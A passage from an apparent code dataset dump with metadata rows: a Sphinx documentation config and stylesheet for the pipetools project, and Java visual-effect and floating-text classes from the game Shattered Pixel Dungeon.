# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'pyramid'
html_style = 'override.css'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'source/_static/logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'source/_static/favico.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pipetoolsdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pipetools.tex', u'pipetools Documentation',
u'0101', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pipetools', u'pipetools Documentation',
[u'0101'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pipetools', u'pipetools Documentation',
u'0101', 'pipetools', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 7,822 | conf | py | en | python | code | {"qsc_code_num_words": 1136, "qsc_code_num_chars": 7822.0, "qsc_code_mean_word_length": 4.8556338, "qsc_code_frac_words_unique": 0.32394366, "qsc_code_frac_chars_top_2grams": 0.01305294, "qsc_code_frac_chars_top_3grams": 0.01087745, "qsc_code_frac_chars_top_4grams": 0.02084844, "qsc_code_frac_chars_dupe_5grams": 0.19198695, "qsc_code_frac_chars_dupe_6grams": 0.14140682, "qsc_code_frac_chars_dupe_7grams": 0.12273387, "qsc_code_frac_chars_dupe_8grams": 0.10188542, "qsc_code_frac_chars_dupe_9grams": 0.07251632, "qsc_code_frac_chars_dupe_10grams": 0.05765047, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00858896, "qsc_code_frac_chars_whitespace": 0.16645359, "qsc_code_size_file_byte": 7822.0, "qsc_code_num_lines": 244.0, "qsc_code_num_chars_line_max": 81.0, "qsc_code_num_chars_line_mean": 32.05737705, "qsc_code_frac_chars_alphabet": 0.83742331, "qsc_code_frac_chars_comments": 0.84479673, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0625, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.31490159, "qsc_code_frac_chars_long_word_length": 0.04498594, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.00409836, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.0, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.03125, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.03125, "qsc_codepython_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 1, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/CircleArc.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.watabou.gltextures.SmartTexture;
import com.watabou.gltextures.TextureCache;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.NoosaScript;
import com.watabou.noosa.Visual;
import com.watabou.utils.PointF;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.FloatBuffer;
import java.nio.ShortBuffer;
public class CircleArc extends Visual {
private float duration = 0;
private float lifespan;
//1f is an entire 360 degree sweep
private float sweep;
private boolean dirty;
private boolean lightMode = true;
private SmartTexture texture;
private FloatBuffer vertices;
private ShortBuffer indices;
private int nTris;
private float rad;
//more triangles means a more precise visual
public CircleArc( int triangles, float radius ) {
super( 0, 0, 0, 0 );
texture = TextureCache.createSolid( 0xFFFFFFFF );
this.nTris = triangles;
this.rad = radius;
vertices = ByteBuffer.
allocateDirect( (nTris * 2 + 1) * 4 * (Float.SIZE / 8) ).
order( ByteOrder.nativeOrder() ).
asFloatBuffer();
indices = ByteBuffer.
allocateDirect( nTris * 3 * Short.SIZE / 8 ).
order( ByteOrder.nativeOrder() ).
asShortBuffer();
sweep = 1f;
updateTriangles();
}
public CircleArc color( int color, boolean lightMode ) {
this.lightMode = lightMode;
hardlight( color );
return this;
}
public CircleArc show( Visual visual, float duration ) {
point( visual.center() );
visual.parent.addToBack( this );
lifespan = this.duration = duration;
return this;
}
public CircleArc show(Group parent, PointF pos, float duration ) {
point( pos );
parent.add( this );
lifespan = this.duration = duration;
return this;
}
public void setSweep( float sweep ){
this.sweep = sweep;
dirty = true;
}
private void updateTriangles(){
dirty = false;
float v[] = new float[4];
indices.position( 0 );
vertices.position( 0 );
v[0] = 0;
v[1] = 0;
v[2] = 0.25f;
v[3] = 0;
vertices.put( v );
v[2] = 0.75f;
v[3] = 0;
//starting position is very top by default, use angle to adjust this.
double start = 2 * (Math.PI - Math.PI*sweep) - Math.PI/2.0;
for (int i = 0; i < nTris; i++) {
double a = start + i * Math.PI * 2 / nTris * sweep;
v[0] = (float)Math.cos( a ) * rad;
v[1] = (float)Math.sin( a ) * rad;
vertices.put( v );
a += 3.1415926f * 2 / nTris * sweep;
v[0] = (float)Math.cos( a ) * rad;
v[1] = (float)Math.sin( a ) * rad;
vertices.put( v );
indices.put( (short)0 );
indices.put( (short)(1 + i * 2) );
indices.put( (short)(2 + i * 2) );
}
indices.position( 0 );
}
@Override
public void update() {
super.update();
if (duration > 0) {
if ((lifespan -= Game.elapsed) > 0) {
sweep = lifespan/duration;
dirty = true;
} else {
killAndErase();
}
}
}
@Override
public void draw() {
super.draw();
if (dirty) {
updateTriangles();
}
if (lightMode) Blending.setLightMode();
NoosaScript script = NoosaScript.get();
texture.bind();
script.uModel.valueM4( matrix );
script.lighting(
rm, gm, bm, am,
ra, ga, ba, aa );
script.camera( camera );
script.drawElements( vertices, indices, nTris * 3 );
if (lightMode) Blending.setNormalMode();
}
}
| 4,251 | CircleArc | java | en | java | code | {"qsc_code_num_words": 552, "qsc_code_num_chars": 4251.0, "qsc_code_mean_word_length": 5.04347826, "qsc_code_frac_words_unique": 0.37318841, "qsc_code_frac_chars_top_2grams": 0.02586207, "qsc_code_frac_chars_top_3grams": 0.04597701, "qsc_code_frac_chars_top_4grams": 0.03017241, "qsc_code_frac_chars_dupe_5grams": 0.14295977, "qsc_code_frac_chars_dupe_6grams": 0.09698276, "qsc_code_frac_chars_dupe_7grams": 0.07686782, "qsc_code_frac_chars_dupe_8grams": 0.07686782, "qsc_code_frac_chars_dupe_9grams": 0.04238506, "qsc_code_frac_chars_dupe_10grams": 0.04238506, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02456779, "qsc_code_frac_chars_whitespace": 0.22441778, "qsc_code_size_file_byte": 4251.0, "qsc_code_num_lines": 191.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 22.2565445, "qsc_code_frac_chars_alphabet": 0.81983621, "qsc_code_frac_chars_comments": 0.21806634, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.20168067, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00300842, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.05882353, "qsc_codejava_score_lines_no_logic": 0.2605042, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Enchanting.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.watabou.noosa.Game;
public class Enchanting extends ItemSprite {
private static final int SIZE = 16;
private enum Phase {
FADE_IN, STATIC, FADE_OUT
}
private static final float FADE_IN_TIME = 0.2f;
private static final float STATIC_TIME = 1.0f;
private static final float FADE_OUT_TIME = 0.4f;
private static final float ALPHA = 0.6f;
private int color;
private Char target;
private Phase phase;
private float duration;
private float passed;
public Enchanting( Item item ) {
super( item.image(), null );
originToCenter();
color = item.glowing().color;
phase = Phase.FADE_IN;
duration = FADE_IN_TIME;
passed = 0;
}
@Override
public void update() {
super.update();
x = target.sprite.center().x - SIZE / 2;
y = target.sprite.y - SIZE;
switch (phase) {
case FADE_IN:
alpha( passed / duration * ALPHA );
scale.set( passed / duration );
break;
case STATIC:
tint( color, passed / duration * 0.8f );
break;
case FADE_OUT:
alpha( (1 - passed / duration) * ALPHA );
scale.set( 1 + passed / duration );
break;
}
if ((passed += Game.elapsed) > duration) {
switch (phase) {
case FADE_IN:
phase = Phase.STATIC;
duration = STATIC_TIME;
break;
case STATIC:
phase = Phase.FADE_OUT;
duration = FADE_OUT_TIME;
break;
case FADE_OUT:
kill();
break;
}
passed = 0;
}
}
public static void show( Char ch, Item item ) {
if (!ch.sprite.visible) {
return;
}
Enchanting sprite = new Enchanting( item );
sprite.target = ch;
ch.sprite.parent.add( sprite );
}
} | 2,652 | Enchanting | java | en | java | code | {"qsc_code_num_words": 355, "qsc_code_num_chars": 2652.0, "qsc_code_mean_word_length": 5.10704225, "qsc_code_frac_words_unique": 0.41690141, "qsc_code_frac_chars_top_2grams": 0.01985659, "qsc_code_frac_chars_top_3grams": 0.04964148, "qsc_code_frac_chars_top_4grams": 0.05074462, "qsc_code_frac_chars_dupe_5grams": 0.1279647, "qsc_code_frac_chars_dupe_6grams": 0.03088803, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0163383, "qsc_code_frac_chars_whitespace": 0.2153092, "qsc_code_size_file_byte": 2652.0, "qsc_code_num_lines": 110.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 24.10909091, "qsc_code_frac_chars_alphabet": 0.85487746, "qsc_code_frac_chars_comments": 0.29449472, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.22535211, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.02816901, "qsc_codejava_score_lines_no_logic": 0.18309859, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/FloatingText.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.scenes.PixelScene;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.shatteredpixel.shatteredpixeldungeon.ui.RenderedTextBlock;
import com.watabou.noosa.Camera;
import com.watabou.noosa.Game;
import com.watabou.noosa.RenderedText;
import com.watabou.utils.Callback;
import com.watabou.utils.SparseArray;
import java.util.ArrayList;
public class FloatingText extends RenderedTextBlock {
private static final float LIFESPAN = 1f;
private static final float DISTANCE = DungeonTilemap.SIZE;
private float timeLeft;
private int key = -1;
private static final SparseArray<ArrayList<FloatingText>> stacks = new SparseArray<>();
public FloatingText() {
super(9*PixelScene.defaultZoom);
setHightlighting(false);
}
@Override
public void update() {
super.update();
if (timeLeft > 0) {
if ((timeLeft -= Game.elapsed) <= 0) {
kill();
} else {
float p = timeLeft / LIFESPAN;
alpha( p > 0.5f ? 1 : p * 2 );
float yMove = (DISTANCE / LIFESPAN) * Game.elapsed;
y -= yMove;
for (RenderedText t : words){
t.y -= yMove;
}
}
}
}
@Override
public void kill() {
if (key != -1) {
synchronized (stacks) {
stacks.get(key).remove(this);
}
key = -1;
}
super.kill();
}
@Override
public void destroy() {
kill();
super.destroy();
}
public void reset( float x, float y, String text, int color ) {
revive();
zoom( 1 / (float)PixelScene.defaultZoom );
text( text );
hardlight( color );
setPos(
PixelScene.align( Camera.main, x - width() / 2),
PixelScene.align( Camera.main, y - height())
);
timeLeft = LIFESPAN;
}
/* STATIC METHODS */
public static void show( float x, float y, String text, int color ) {
Game.runOnRenderThread(new Callback() {
@Override
public void call() {
FloatingText txt = GameScene.status();
if (txt != null){
txt.reset(x, y, text, color);
}
}
});
}
public static void show( float x, float y, int key, String text, int color ) {
Game.runOnRenderThread(new Callback() {
@Override
public void call() {
FloatingText txt = GameScene.status();
if (txt != null){
txt.reset(x, y, text, color);
push(txt, key);
}
}
});
}
private static void push( FloatingText txt, int key ) {
synchronized (stacks) {
txt.key = key;
ArrayList<FloatingText> stack = stacks.get(key);
if (stack == null) {
stack = new ArrayList<>();
stacks.put(key, stack);
}
if (stack.size() > 0) {
FloatingText below = txt;
int aboveIndex = stack.size() - 1;
while (aboveIndex >= 0) {
FloatingText above = stack.get(aboveIndex);
if (above.bottom() + 4 > below.top()) {
above.setPos(above.left(), below.top() - above.height() - 4);
below = above;
aboveIndex--;
} else {
break;
}
}
}
stack.add(txt);
}
}
}
| 3,889 | FloatingText | java | en | java | code | {"qsc_code_num_words": 470, "qsc_code_num_chars": 3889.0, "qsc_code_mean_word_length": 5.41914894, "qsc_code_frac_words_unique": 0.37446809, "qsc_code_frac_chars_top_2grams": 0.03180212, "qsc_code_frac_chars_top_3grams": 0.07459757, "qsc_code_frac_chars_top_4grams": 0.0691009, "qsc_code_frac_chars_dupe_5grams": 0.21044366, "qsc_code_frac_chars_dupe_6grams": 0.16097369, "qsc_code_frac_chars_dupe_7grams": 0.13898704, "qsc_code_frac_chars_dupe_8grams": 0.13898704, "qsc_code_frac_chars_dupe_9grams": 0.10208088, "qsc_code_frac_chars_dupe_10grams": 0.10208088, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01161633, "qsc_code_frac_chars_whitespace": 0.22525071, "qsc_code_size_file_byte": 3889.0, "qsc_code_num_lines": 163.0, "qsc_code_num_chars_line_max": 89.0, "qsc_code_num_chars_line_mean": 23.85889571, "qsc_code_frac_chars_alphabet": 0.83372054, "qsc_code_frac_chars_comments": 0.20570841, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.20353982, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07964602, "qsc_codejava_score_lines_no_logic": 0.18584071, "qsc_codejava_frac_words_no_modifier": 0.9, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0101/pipetools | docs/source/_static/override.css | @import url('pyramid.css');
body {font-family: "Segoe UI", sans-serif;}
div.body h1, div.body h2, div.body h3, div.body h4, div.body h5, div.body h6,
div.sphinxsidebar h3, div.sphinxsidebar h4 {
font-family: "Segoe UI", "Droid Sans", sans-serif;}
div.body .section {max-width: 840px;}
em.property {font-style: normal; color: #8D6445;}
dt em, dd cite, cite {color:#329D29; font-style: normal;}
/*p em {color: #6D581E;}*/
dd {
background: #F7F7F7;
background: rgba(100, 100, 100, .05);
border-radius: 8px;
padding: 2px 10px 1px;
margin-left: 0;
margin-bottom: 30px;
}
h2 {border-bottom: 2px solid #D2D2D2;}
div.header {background: #19162f url('headerbg.png') repeat-x top;}
div.logo {padding: 0;}
div.logo a {display: inline-block;}
div.body h3 {font-weight:bold; margin-bottom: 0; padding-bottom: 0;}
p {margin-top: 3px;}
div.body ul, div.body ol {margin-bottom: 30px;}
tt, pre {font-family: Consolas, monospace; font-size: 1em;}
tt.docutils.literal {background-color: rgba(0, 0, 0, 0.07); padding: 1px 4px; border-radius:4px;}
a tt.docutils.literal,
h1 tt.docutils.literal,
h2 tt.docutils.literal,
h3 tt.docutils.literal {background-color: transparent;}
a.internal.reference em {color: #1B61D6;}
.sphinxsidebarwrapper {overflow: hidden;}
div.highlight {background-color: transparent;}
.highlight pre, .highlight-python pre {
background-color: #FFFFFF;
background-color: #222222;
color: #e5e5e5;
border: none;
/*box-shadow: 2px 3px 6px rgba(0, 0, 0, 0.3);*/
border-radius: 5px;
}
| 1,538 | override | css | en | css | data | {"qsc_code_num_words": 231, "qsc_code_num_chars": 1538.0, "qsc_code_mean_word_length": 4.58874459, "qsc_code_frac_words_unique": 0.43290043, "qsc_code_frac_chars_top_2grams": 0.06603774, "qsc_code_frac_chars_top_3grams": 0.08018868, "qsc_code_frac_chars_top_4grams": 0.03207547, "qsc_code_frac_chars_dupe_5grams": 0.0754717, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.07539985, "qsc_code_frac_chars_whitespace": 0.14629389, "qsc_code_size_file_byte": 1538.0, "qsc_code_num_lines": 54.0, "qsc_code_num_chars_line_max": 98.0, "qsc_code_num_chars_line_mean": 28.48148148, "qsc_code_frac_chars_alphabet": 0.73191165, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.03185956, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_words_unique": 0, 